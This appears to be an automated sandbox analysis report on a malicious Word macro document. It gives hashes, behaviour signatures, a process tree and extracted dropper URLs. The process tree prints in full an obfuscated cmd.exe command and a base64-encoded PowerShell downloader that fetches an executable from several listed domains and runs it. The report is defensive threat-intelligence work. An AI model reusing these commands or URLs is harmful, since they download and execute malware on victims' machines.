Overview

overview

10

Static

static

8

fcb90055f2...18.doc

windows7-x64

10

fcb90055f2...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    28/09/2024, 16:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fcb90055f209cb85ba4d3462c20e1082_JaffaCakes118.doc

  • Size

    77KB

  • MD5

    fcb90055f209cb85ba4d3462c20e1082

  • SHA1

    d436421976833148ed4976a4d25a4b9e8760cc69

  • SHA256

    535ababeb7ea40cdc0a3fbcca2039e73bbc5224d8d246fab4a8077b67588c8e8

  • SHA512

    1dce35da06df4a294c4e0330c62183bcf4c08e4af579ab0945f7dc88b82062a0ca047fc1adfc393e4c84bf7adf1decdaf523eb326c5aa7c6877985671a1eb198

  • SSDEEP

    1536:jptJlmrJpmxlRw99NBP+aEsCxaupItj8SWnQt:Nte2dw99fBupuj

Score
10/10
discovery

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://4surskate.com/vKi
exe.dropper

http://riakom.com/T
exe.dropper

http://zavod-pt.com/T
exe.dropper

http://natco-pharma.com/PRBHaG
exe.dropper

http://bitwaopoznan.pl//gp6

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fcb90055f209cb85ba4d3462c20e1082_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2384
      • C:\Windows\SysWOW64\CMD.exe
        CMD /v:^O^ ^ /R" ^Se^T ^ ^ ^h6^AV==^AAIAACA^g^A^A^IAAC^A^g^AAIAACA^g^AAI^AAC^AgA^A^IAACAgA^AI^AAC^A^9^B^Qf^AsHA^oB^wY^AQH^AhBw^YA^0HA^7A^w^aAE^GAlBgc^AI^G^A^7A^wV^A^YE^Ak^B^A^JAACAtBQZA^Q^H^A^JBQL^A^U^G^Ar^B^wb^AY^H^AuB^QS^As^DA^p^AwVAYE^A^kBA^JAAC^A^s^A^QQ^A^wEAoB^AJAgCA^l^BAbAk^GA^G^BA^Z^AE^G^AvBA^b^A4^GA^3B^wb^AQ^EAuA^g^Z^A8EAB^B^A^J^A^s^HA5BgcA^Q^HA^7^B^QKAQG^A^o^B^AV^A^QCA^g^Ag^bA^k^GA^g^AQQA^wE^A^oB^AJAgC^Ao^B^w^YAE^GAlBgc^A^8^G^A^m^B^wOAcC^A^lBA^e^AUG^Au^A^w^J^AsCApB^gc^A^g^F^A^k^A^w^K^AcC^AcBwJ^AsC^A^j^BQ^aAw^GAiBQ^d^A^AH^A6^A^gd^A4^GAlBA^J^A^0D^AX^B^gR^A^QG^A^kA^wOAcCA^y^AA^M^A^Q^DAnA^AI^A0^DA^gAQ^aA^IH^AYB^A^J^AsD^A^pAw^J^A^A^E^An^A^A^K^A^Q^HA^p^BAb^AAHA^TBgLAcCA^2^AAc^AcGAv^AwLA^wGAwB^g^LA^4GAh^B^g^bA^o^H^AvB^AcA^8^GAhB^wdAQH^ApB^g^Y^A^8C^AvAgO^A^A^HA0^BA^dAgG^AABwR^AE^GA^I^B^gQA^IF^AQ^B^wLA0^GAv^Bw^YA4CA^hB^Q^b^AIHA^hBA^a^AA^H^A^tAwbAM^GA0^BQY^A4GAvA^wL^A^o^D^A^wB^A^dA^QH^Ao^BA^Q^AQFAvAQ^bA8^G^Aj^B^gL^AQ^H^A^w^B^Q^LA^Q^G^Av^B^gdAEGA^6B^wLA8CA^6^AAc^AQ^HA^0^B^Aa^AAE^A^U^B^wL^A0G^AvB^w^YA^4C^At^Bwb^A^sG^A^h^B^Q^aA^IHAvA^wL^Ao^D^Aw^B^Ad^A^QH^Ao^BA^QAk^G^A^L^B^g^dA8C^A^tB^w^bAM^G^A^u^A^QZ^A^Q^H^Ah^Bwa^A^M^HA^y^B^Q^d^AM^HA^0^A^wLA^8CA^6AAc^A^QHA0^BA^aAcC^A9^AAZAg^G^AUB^AJ^AsDA^0^B^gb^AUGAp^BA^bAMEAi^BQ^Z^AcF^AuA^A^dA^U^G^A^O^B^A^I^AQH^AjB^Q^Z^AoG^A^iBw^bA0C^A^3BQZA^4^GA^9^A^g^Z^A^8E^A^B^BAJ^ ^e^-^ lle^hsr^e^wop&& ^F^or /^l %k ^iN ( ^8^81^ -^1^ ^ ^0)^Do ^s^ET u^f^y^d=!u^f^y^d!!^h6^AV:~ %k, 1!& i^f %k l^s^S ^1 C^aL^L %u^f^y^d:~ ^-^8^82% "
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e JABBAE8AZgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABUAGgAZAA9ACcAaAB0AHQAcAA6AC8ALwA0AHMAdQByAHMAawBhAHQAZQAuAGMAbwBtAC8AdgBLAGkAQABoAHQAdABwADoALwAvAHIAaQBhAGsAbwBtAC4AYwBvAG0ALwBUAEAAaAB0AHQAcAA6AC8ALwB6AGEAdgBvAGQALQBwAHQALgBjAG8AbQAvAFQAQABoAHQAdABwADoALwAvAG4AYQB0AGMAbwAtAHAAaABhAHIAbQBhAC4AYwBvAG0ALwBQAFIAQgBIAGEARwBAAGgAdAB0AHAAOgAvAC8AYgBpAHQAdwBhAG8AcABvAHoAbgBhAG4ALgBwAGwALwAvAGcAcAA2ACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABYAHIAaQAgAD0AIAAnADQAMAAyACcAOwAkAGQARgBXAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAFgAcgBpACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABoAEwAQQAgAGkAbgAgACQAVABoAGQAKQB7AHQAcgB5AHsAJABBAE8AZgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABoAEwAQQAsACAAJABkAEYAVwApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABkAEYAVwA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=
          3⤵
          • Blocklisted process makes network request
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2820

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      19KB

      MD5

      c4c9cd590f3fc1dbbd71b41c99b3ecc8

      SHA1

      0abe69eda7b93d65b793e9dbc72683d3b7bac960

      SHA256

      5d44b2607960f6416117cfc5cb80bdb3d89e4d5e6f33e8d560be92105a26ef5d

      SHA512

      f855431f00fc77c9fc72009ce2e57e79023493b98db5f9e7847283b3f119aa3c5f569cf2d4cf8c3a45995b0460d2e88746843a377ccfc59b47149fec027010fd

      Download Submit

    • memory/2388-26-0x0000000006760000-0x0000000006860000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2388-2-0x0000000071A7D000-0x0000000071A88000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2388-30-0x0000000006760000-0x0000000006860000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2388-29-0x0000000006760000-0x0000000006860000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2388-28-0x0000000006760000-0x0000000006860000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2388-0-0x000000002F1D1000-0x000000002F1D2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2388-33-0x0000000071A7D000-0x0000000071A88000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2388-34-0x0000000006760000-0x0000000006860000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2388-35-0x0000000006760000-0x0000000006860000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2388-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2388-50-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2388-51-0x0000000071A7D000-0x0000000071A88000-memory.dmp

      Filesize

      44KB

      Download